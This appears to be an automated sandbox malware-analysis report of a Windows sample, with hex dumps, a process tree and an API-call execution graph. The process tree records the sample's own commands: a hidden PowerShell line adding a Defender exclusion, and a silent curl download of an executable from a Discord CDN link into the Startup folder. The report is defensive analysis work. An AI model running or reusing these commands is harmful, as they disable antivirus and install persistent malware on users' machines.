                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1369INData Raw: 00 00 00 40 80 e4 0f 80 fc 0f 75 06 81 ca 00 00 10 00 80 fc 06 75 19 25 f0 0f ff 0f 3d 70 06 05 00 74 07 3d 50 06 08 00 75 06 81 e1 ff ff ff fb 0f ba e2 1c 73 20 81 e2 ff ff ff ef 41 83 fa 00 74 14 81 ca 00 00 00 10 c1 eb 10 80 fb 01 77 06 81 e2 ff ff ff ef 41 81 e1 00 08 00 00 81 e1 ff f7 ff ff 41 09 c9 41 89 d2 41 83 fb 07 72 32 b8 07 00 00 00 31 c9 0f a2 41 0f ba e1 1a 72 06 81 e3 ff ff f7 ff 66 0f 7e c0 25 f0 0f ff 0f 3d 50 06 05 00 75 06 81 e3 ff ff fe ff 89 5f 08 89 4f 0c 41 0f ba e1 1b 73 20 31 c9 0f 01 d0 25 e6 00 00 00 3d e6 00 00 00 74 1f 81 67 08 ff ff de 3f 83 e0 06 83 f8 06 74 10 b8 ff e7 ff ef 41 21 c1 b8 df ff de 3f 21 47 08 49 c1 e1 20 44 89 d0 4c 89 c3 4c 09 c8 48 8b 7c 24 08 48 8b 74 24 10 f3 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90
                                                                                                                                                                                                        Data Ascii: @uu%=pt=Pus AtwAAAAr21Arf~%=Pu_OAs 1%=tg?tA!?!GI DLLH|$Ht$
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1369INData Raw: 7c f5 02 4c 33 44 fd 01 c1 e8 10 48 8d 34 09 0f b6 c8 48 8d 3c 12 0f b6 d4 4c 33 54 f5 00 4c 33 5c fd 07 8b 44 24 18 48 8d 34 09 0f b6 cb 48 8d 3c 12 0f b6 d7 4c 33 64 f5 06 4c 33 6c fd 05 c1 eb 10 48 8d 34 09 0f b6 cb 48 8d 3c 12 0f b6 d7 4c 33 74 f5 04 4c 33 7c fd 03 8b 5c 24 1c 48 8d 34 09 0f b6 c8 48 8d 3c 12 0f b6 d4 4c 33 44 f5 02 4c 33 4c fd 01 c1 e8 10 48 8d 34 09 0f b6 c8 48 8d 3c 12 0f b6 d4 4c 33 5c f5 00 4c 33 64 fd 07 8b 44 24 20 48 8d 34 09 0f b6 cb 48 8d 3c 12 0f b6 d7 4c 33 6c f5 06 4c 33 74 fd 05 c1 eb 10 48 8d 34 09 0f b6 cb 48 8d 3c 12 0f b6 d7 4c 33 7c f5 04 4c 33 44 fd 03 8b 5c 24 24 48 8d 34 09 0f b6 c8 48 8d 3c 12 0f b6 d4 4c 33 4c f5 02 4c 33 54 fd 01 c1 e8 10 48 8d 34 09 0f b6 c8 48 8d 3c 12 0f b6 d4 4c 33 64 f5 00 4c 33 6c fd 07
                                                                                                                                                                                                        Data Ascii: |L3DH4H<L3TL3\D$H4H<L3dL3lH4H<L3tL3|\$H4H<L3DL3LH4H<L3\L3dD$ H4H<L3lL3tH4H<L3|L3D\$$H4H<L3LL3TH4H<L3dL3l
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1369INData Raw: 10 48 8d 34 09 0f b6 c8 48 8d 3c 12 0f b6 d4 4c 33 74 f5 00 4c 33 7c fd 07 8b 44 24 78 48 8d 34 09 0f b6 cb 48 8d 3c 12 0f b6 d7 4c 33 44 f5 06 4c 33 4c fd 05 c1 eb 10 48 8d 34 09 0f b6 cb 48 8d 3c 12 0f b6 d7 4c 33 54 f5 04 4c 33 5c fd 03 8b 5c 24 7c 48 8d 34 09 0f b6 c8 48 8d 3c 12 0f b6 d4 4c 33 64 f5 02 4c 33 6c fd 01 c1 e8 10 48 8d 34 09 0f b6 c8 48 8d 3c 12 0f b6 d4 4c 33 7c f5 00 4c 33 44 fd 07 48 8d 34 09 0f b6 cb 48 8d 3c 12 0f b6 d7 4c 33 4c f5 06 4c 33 54 fd 05 c1 eb 10 48 8d 34 09 0f b6 cb 48 8d 3c 12 0f b6 d7 4c 33 5c f5 04 4c 33 64 fd 03 48 8d 34 09 0f b6 c8 48 8d 3c 12 0f b6 d4 4c 33 6c f5 02 4c 33 74 fd 01 48 8d 9c 24 80 00 00 00 48 8b 73 18 48 83 c6 01 48 83 fe 0a 74 36 48 89 73 18 4c 89 44 24 40 4c 89 4c 24 48 4c 89 54 24 50 4c 89 5c 24
                                                                                                                                                                                                        Data Ascii: H4H<L3tL3|D$xH4H<L3DL3LH4H<L3TL3\\$|H4H<L3dL3lH4H<L3|L3DH4H<L3LL3TH4H<L3\L3dH4H<L3lL3tH$HsHHt6HsLD$@LL$HLT$PL\$
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1369INData Raw: e4 73 53 d5 97 27 27 9c 27 25 bb 4e 02 27 27 9c 27 25 bb 4e 02 41 41 19 41 32 58 82 73 41 41 19 41 32 58 82 73 8b 8b 16 8b 2c 9d 0b a7 8b 8b 16 8b 2c 9d 0b a7 a7 a7 a6 a7 51 01 53 f6 a7 a7 a6 a7 51 01 53 f6 7d 7d e9 7d cf 94 fa b2 7d 7d e9 7d cf 94 fa b2 95 95 6e 95 dc fb 37 49 95 95 6e 95 dc fb 37 49 d8 d8 47 d8 8e 9f ad 56 d8 d8 47 d8 8e 9f ad 56 fb fb cb fb 8b 30 eb 70 fb fb cb fb 8b 30 eb 70 ee ee 9f ee 23 71 c1 cd ee ee 9f ee 23 71 c1 cd 7c 7c ed 7c c7 91 f8 bb 7c 7c ed 7c c7 91 f8 bb 66 66 85 66 17 e3 cc 71 66 66 85 66 17 e3 cc 71 dd dd 53 dd a6 8e a7 7b dd dd 53 dd a6 8e a7 7b 17 17 5c 17 b8 4b 2e af 17 17 5c 17 b8 4b 2e af 47 47 01 47 02 46 8e 45 47 47 01 47 02 46 8e 45 9e 9e 42 9e 84 dc 21 1a 9e 9e 42 9e 84 dc 21 1a ca ca 0f ca 1e c5 89 d4 ca ca
                                                                                                                                                                                                        Data Ascii: sS'''%N'''%NAAA2XsAAA2Xs,,QSQS}}}}}}n7In7IGVGV0p0p#q#q||||||fffqfffqS{S{\K.\K.GGGFEGGGFEB!B!
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1369INData Raw: 9d f0 60 ad 30 30 c0 30 9d f0 60 ad ef ef 9b ef 2b 74 c3 c4 ef ef 9b ef 2b 74 c3 c4 3f 3f fc 3f e5 c3 7e da 3f 3f fc 3f e5 c3 7e da 55 55 49 55 92 1c aa c7 55 55 49 55 92 1c aa c7 a2 a2 b2 a2 79 10 59 db a2 a2 b2 a2 79 10 59 db ea ea 8f ea 03 65 c9 e9 ea ea 8f ea 03 65 c9 e9 65 65 89 65 0f ec ca 6a 65 65 89 65 0f ec ca 6a ba ba d2 ba b9 68 69 03 ba ba d2 ba b9 68 69 03 2f 2f bc 2f 65 93 5e 4a 2f 2f bc 2f 65 93 5e 4a c0 c0 27 c0 4e e7 9d 8e c0 c0 27 c0 4e e7 9d 8e de de 5f de be 81 a1 60 de de 5f de be 81 a1 60 1c 1c 70 1c e0 6c 38 fc 1c 1c 70 1c e0 6c 38 fc fd fd d3 fd bb 2e e7 46 fd fd d3 fd bb 2e e7 46 4d 4d 29 4d 52 64 9a 1f 4d 4d 29 4d 52 64 9a 1f 92 92 72 92 e4 e0 39 76 92 92 72 92 e4 e0 39 76 75 75 c9 75 8f bc ea fa 75 75 c9 75 8f bc ea fa 06 06 18
                                                                                                                                                                                                        Data Ascii: `000`+t+t???~???~UUIUUUIUyYyYeeeeejeeejhihi///e^J///e^J'N'N_`_`pl8pl8.F.FMM)MRdMM)MRdr9vr9vuuuuuu


                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:23:15:01
                                                                                                                                                                                                        Start date:13/11/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                        Imagebase:0x7ff67a360000
                                                                                                                                                                                                        File size:34'965'741 bytes
                                                                                                                                                                                                        MD5 hash:8FB77810C61E160A657298815346996E
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:23:15:02
                                                                                                                                                                                                        Start date:13/11/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                        Start time:23:15:02
                                                                                                                                                                                                        Start date:13/11/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /d /s /c "C:\Users\user\AppData\Local\Temp\decrypted_executable.exe"
                                                                                                                                                                                                        Imagebase:0x7ff711700000
                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                        Start time:23:15:02
                                                                                                                                                                                                        Start date:13/11/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\decrypted_executable.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\decrypted_executable.exe
                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                        File size:55'296 bytes
                                                                                                                                                                                                        MD5 hash:488192B42924057D251CC3D5212DC451
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 38%, ReversingLabs
                                                                                                                                                                                                        • Detection: 36%, Virustotal, Browse
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                        Start time:23:15:02
                                                                                                                                                                                                        Start date:13/11/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe"
                                                                                                                                                                                                        Imagebase:0x7ff711700000
                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:23:15:02
                                                                                                                                                                                                        Start date:13/11/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                        Start time:23:15:02
                                                                                                                                                                                                        Start date:13/11/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:powershell -w hidden -c Add-MpPreference -ExclusionPath ""
                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                        Start time:23:15:15
                                                                                                                                                                                                        Start date:13/11/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:curl --silent --output "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"
                                                                                                                                                                                                        Imagebase:0x7ff695c50000
                                                                                                                                                                                                        File size:530'944 bytes
                                                                                                                                                                                                        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                        Start time:23:15:33
                                                                                                                                                                                                        Start date:13/11/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"
                                                                                                                                                                                                        Imagebase:0x7ff770ac0000
                                                                                                                                                                                                        File size:86'458'059 bytes
                                                                                                                                                                                                        MD5 hash:419576A88D2EB1B14DF6EC22F7579C67
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                        • Detection: 1%, Virustotal, Browse
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Reset < >
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.2415855887.00000177516C3000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000177516C3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_177516c3000_file.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: I_h
                                                                                                                                                                                                          • API String ID: 0-3318493559
                                                                                                                                                                                                          • Opcode ID: 011b9d911fe177f8f8e0c7f12ea8a9b5c5adde7f0c2a96efc031c33b24251288
                                                                                                                                                                                                          • Instruction ID: 0a44c3828b68be5918ad5488a972b7d9c9b307cb4c43db88ef76ae969ef994df
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 011b9d911fe177f8f8e0c7f12ea8a9b5c5adde7f0c2a96efc031c33b24251288
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FB1567060CA888FDF55EF68D899EDC7BF0FF29704F154299E449D72A2CA31E8528B01
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.2415855887.00000177516C3000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000177516C3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_177516c3000_file.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e0d6f266a55ba3af2f101a9795ce1ac0f544c06673d1f24bef4c055dab91eee6
                                                                                                                                                                                                          • Instruction ID: fbcb84316167f1fda1e0fa23391ae99a47209040b12fc71702f7822ad1a6201a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0d6f266a55ba3af2f101a9795ce1ac0f544c06673d1f24bef4c055dab91eee6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A71397061CA489FDF59EF5CD885E9C7BF0FB28715F150259E909E3292DA31E891CB40
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.2415855887.00000177516C3000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000177516C3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_177516c3000_file.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7e6103632de9af64fa9f77e03d0ca9038e7691373c18182f641c798623c08424
                                                                                                                                                                                                          • Instruction ID: bff102596fad2cf4a7fe9d89af9d04c470c448aa648b9e394e01cc613587fc80
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e6103632de9af64fa9f77e03d0ca9038e7691373c18182f641c798623c08424
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F08CB0519648DFEB69AF68C894EDC7BB0FF19321F110249F94AD7293CA3589818B05
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.2415855887.00000177516C3000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000177516C3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_177516c3000_file.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3a9452042b3c323f8991744db2ec4ae6e776adb8c91a8c90e68c2edaf2f54b92
                                                                                                                                                                                                          • Instruction ID: bb3e12b65607d6b753a56fe275d75e398495817e93f1d4a0421afd5e031df233
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a9452042b3c323f8991744db2ec4ae6e776adb8c91a8c90e68c2edaf2f54b92
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAE06D705196489FDB69AF68DC94BCC3BB1FF59320F110605F54AE32D2CA3589418B00

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:12.5%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:2.5%
                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                          Total number of Limit Nodes:28
                                                                                                                                                                                                          execution_graph 8149 14000e3f0 8150 14000e4ee 8149->8150 8151 14000e40a 8149->8151 8151->8150 8152 14000e483 8151->8152 8153 14000e41a 8151->8153 8166 14000e770 WideCharToMultiByte 8152->8166 8154 14000e451 8153->8154 8155 14000e425 8153->8155 8154->8154 8157 14000e45d WriteFile 8154->8157 8159 14000e620 5 API calls 8155->8159 8163 14000e445 8159->8163 8160 14000e4c5 WriteFile 8162 14000e4dc HeapFree 8160->8162 8161 14000e4b7 8170 14000e620 8161->8170 8162->8150 8165 14000e4bf 8165->8162 8167 14000e7b9 RtlAllocateHeap 8166->8167 8168 14000e4a0 8166->8168 8167->8168 8169 14000e7d8 WideCharToMultiByte 8167->8169 8168->8150 8168->8160 8168->8161 8169->8168 8171 14000e644 8170->8171 8172 14000e75e 8170->8172 8173 14000e673 8171->8173 8174 14000e64a SetFilePointer 8171->8174 8172->8165 8175 14000e6ff 8173->8175 8178 14000e67e 8173->8178 8174->8173 8183 14000ddc0 8175->8183 8177 14000e707 8180 14000e711 WriteFile 8177->8180 8181 14000e739 memcpy 8177->8181 8179 14000e6b7 8178->8179 8182 14000e699 memcpy 8178->8182 8179->8165 8180->8165 8181->8165 8182->8165 8184 14000de04 8183->8184 8185 14000ddd4 WriteFile 8183->8185 8184->8177 8185->8177 8145 140010ffc 8146 140011009 8145->8146 8147 14001101f 8145->8147 8146->8147 8148 140011013 TlsFree 8146->8148 8148->8147 8186 140001000 8187 14000101d 8186->8187 8234 140012060 HeapCreate TlsAlloc 8187->8234 8189 14000105b 8237 14000de20 8189->8237 8191 140001065 8240 14000c980 HeapCreate 8191->8240 8193 140001074 8241 14000b538 memset 00007FF8B75C5550 CoInitialize 8193->8241 8195 14000107e 8242 1400120d0 8195->8242 8197 1400010a3 8249 14000ccd8 8197->8249 8204 14000d524 16 API calls 8205 14000112a 8204->8205 8206 14000d444 11 API calls 8205->8206 8207 14000114e 8206->8207 8274 140011d30 8207->8274 8209 140001185 8210 1400120d0 3 API calls 8209->8210 8211 1400011a6 8210->8211 8212 14000d524 16 API calls 8211->8212 8213 1400011b2 8212->8213 8214 14000d444 11 API calls 8213->8214 8215 1400011d6 8214->8215 8280 14000c4d0 8215->8280 8219 1400011ef 8287 1400121c0 GetLastError TlsGetValue SetLastError 8219->8287 8221 1400011ff 8288 140004211 8221->8288 8225 14000121f 8311 1400021ea 8225->8311 8228 140001236 8418 14000593c 8228->8418 8770 140012c50 RtlAllocateHeap RtlAllocateHeap TlsSetValue 8234->8770 8236 14001208c 8236->8189 8771 140011370 RtlAllocateHeap RtlAllocateHeap RtlInitializeCriticalSection 8237->8771 8239 14000de38 8239->8191 8240->8193 8241->8195 8243 140012178 8242->8243 8244 1400120f3 8242->8244 8245 140012183 HeapFree 8243->8245 8248 14001215f 8243->8248 8246 140012133 RtlReAllocateHeap 8244->8246 8247 14001210d RtlAllocateHeap 8244->8247 8245->8248 8246->8248 8247->8248 8248->8197 8772 14000ce30 8249->8772 8252 14000cd23 RtlAllocateHeap 8254 14000cdcc HeapFree 8252->8254 8255 14000cd51 8252->8255 8253 1400010e6 8258 14000d524 8253->8258 8254->8253 8781 1400117fc 8255->8781 8259 1400010fa 8258->8259 8260 14000d52d 8258->8260 8269 14000d444 RtlAllocateHeap 8259->8269 8847 14000d60c 8260->8847 8263 140011968 9 API calls 8264 14000d548 8263->8264 8265 14000d562 HeapFree 8264->8265 8266 14000d57c 8264->8266 8265->8265 8265->8266 8267 14000d582 HeapFree 8266->8267 8268 14000d595 HeapFree 8266->8268 8267->8268 8268->8259 8270 14000d484 RtlAllocateHeap 8269->8270 8271 14000d4a0 8269->8271 8270->8271 8272 1400117fc 9 API calls 8271->8272 8273 14000111e 8272->8273 8273->8204 8854 140011ef4 8274->8854 8277 140011dc6 8277->8209 8278 140011d6e RtlAllocateHeap 8278->8277 8279 140011d90 memset 8278->8279 8279->8277 8281 14000c890 8280->8281 8282 14000c8a5 RtlRemoveVectoredExceptionHandler 8281->8282 8283 14000c8b6 8281->8283 8282->8283 8284 14000c8bb RtlAddVectoredExceptionHandler 8283->8284 8285 1400011e5 8283->8285 8284->8285 8286 1400121c0 GetLastError TlsGetValue SetLastError 8285->8286 8286->8219 8287->8221 8859 1400123e0 8288->8859 8290 140004222 8870 1400121c0 GetLastError TlsGetValue SetLastError 8290->8870 8292 1400042a4 8871 1400121c0 GetLastError TlsGetValue SetLastError 8292->8871 8294 1400042b8 8872 1400121c0 GetLastError TlsGetValue SetLastError 8294->8872 8296 1400042c8 8873 1400121c0 GetLastError TlsGetValue SetLastError 8296->8873 8298 1400042d8 8874 140010d90 8298->8874 8302 14000430a 8878 140007dc0 8302->8878 8306 14000120e 8307 140012210 TlsGetValue 8306->8307 8308 140012251 RtlAllocateHeap 8307->8308 8309 140012276 RtlReAllocateHeap 8307->8309 8310 1400122a1 8308->8310 8309->8310 8310->8225 8312 1400123e0 21 API calls 8311->8312 8313 1400021ff 8312->8313 8916 1400121c0 GetLastError TlsGetValue SetLastError 8313->8916 8315 140002209 8917 1400121c0 GetLastError TlsGetValue SetLastError 8315->8917 8317 140002227 8918 1400121c0 GetLastError TlsGetValue SetLastError 8317->8918 8319 14000223b 8919 14000c0c4 8319->8919 8323 140012360 HeapFree 8324 140002666 8323->8324 8326 140012360 HeapFree 8324->8326 8325 14000239c 8327 14000d60c 4 API calls 8325->8327 8328 140002678 8326->8328 8330 1400023a8 8327->8330 8329 140012360 HeapFree 8328->8329 8331 14000268a 8329->8331 8926 1400121c0 GetLastError TlsGetValue SetLastError 8330->8926 8334 140012360 HeapFree 8331->8334 8333 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8343 140002255 8333->8343 8336 14000269c 8334->8336 8335 1400023b2 8927 1400121c0 GetLastError TlsGetValue SetLastError 8335->8927 8338 140012360 HeapFree 8336->8338 8340 140001224 8338->8340 8339 1400023c6 8928 1400121c0 GetLastError TlsGetValue SetLastError 8339->8928 8340->8228 8649 14000433f 8340->8649 8342 1400023d6 8929 1400121c0 GetLastError TlsGetValue SetLastError 8342->8929 8343->8325 8343->8333 8345 1400121c0 GetLastError TlsGetValue SetLastError 8343->8345 8350 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8343->8350 8398 140002646 8343->8398 8345->8343 8346 1400023e6 8930 1400121c0 GetLastError TlsGetValue SetLastError 8346->8930 8348 1400023fb 8931 1400121c0 GetLastError TlsGetValue SetLastError 8348->8931 8350->8343 8351 14000240f 8932 140007ce0 8351->8932 8355 140002431 8941 140010ba0 8355->8941 8359 140002450 8360 140007dc0 6 API calls 8359->8360 8361 140002463 8360->8361 8362 140012210 3 API calls 8361->8362 8363 140002472 8362->8363 8950 1400121c0 GetLastError TlsGetValue SetLastError 8363->8950 8365 140002481 8951 140012450 8365->8951 8367 140002490 8368 140012210 3 API calls 8367->8368 8369 14000249f 8368->8369 8956 1400121c0 GetLastError TlsGetValue SetLastError 8369->8956 8371 1400024a9 8957 1400121c0 GetLastError TlsGetValue SetLastError 8371->8957 8373 1400024bd 8958 1400121c0 GetLastError TlsGetValue SetLastError 8373->8958 8375 1400024cd 8959 1400121c0 GetLastError TlsGetValue SetLastError 8375->8959 8377 1400024dd 8378 140010ba0 6 API calls 8377->8378 8379 1400024f9 8378->8379 8960 1400125d0 TlsGetValue 8379->8960 8381 140002503 8382 140007dc0 6 API calls 8381->8382 8383 140002516 8382->8383 8384 140012210 3 API calls 8383->8384 8385 140002525 8384->8385 8961 1400121c0 GetLastError TlsGetValue SetLastError 8385->8961 8387 14000252f 8962 1400121c0 GetLastError TlsGetValue SetLastError 8387->8962 8389 140002543 8963 140007e50 8389->8963 8391 14000255f 8392 140012210 3 API calls 8391->8392 8393 14000256e 8392->8393 8971 1400124c0 8393->8971 8398->8323 8419 140005945 8418->8419 8419->8419 8420 1400123e0 21 API calls 8419->8420 8439 14000595f 8420->8439 8421 1400121c0 GetLastError TlsGetValue SetLastError 8421->8439 8422 1400121c0 GetLastError TlsGetValue SetLastError 8435 140005a39 8422->8435 8423 140007c90 3 API calls 8423->8439 8424 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8424->8439 8425 140007c90 3 API calls 8425->8435 8426 1400121c0 GetLastError TlsGetValue SetLastError 8447 140005b13 8426->8447 8427 140007c90 3 API calls 8427->8447 8428 1400121c0 GetLastError TlsGetValue SetLastError 8454 140005bed 8428->8454 8429 1400121c0 GetLastError TlsGetValue SetLastError 8461 140005cc7 8429->8461 8430 140007c90 3 API calls 8430->8454 8431 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8431->8439 8432 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8432->8435 8433 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8433->8454 8435->8422 8435->8425 8435->8432 8442 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8435->8442 8435->8447 8436 140007c90 3 API calls 8467 140005da1 8436->8467 8437 1400121c0 GetLastError TlsGetValue SetLastError 8471 140005e7f 8437->8471 8438 140006119 8995 1400121c0 GetLastError TlsGetValue SetLastError 8438->8995 8439->8421 8439->8423 8439->8424 8439->8431 8439->8435 8440 140007c90 3 API calls 8440->8471 8442->8435 8443 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8443->8447 8444 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8444->8454 8445 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8445->8467 8446 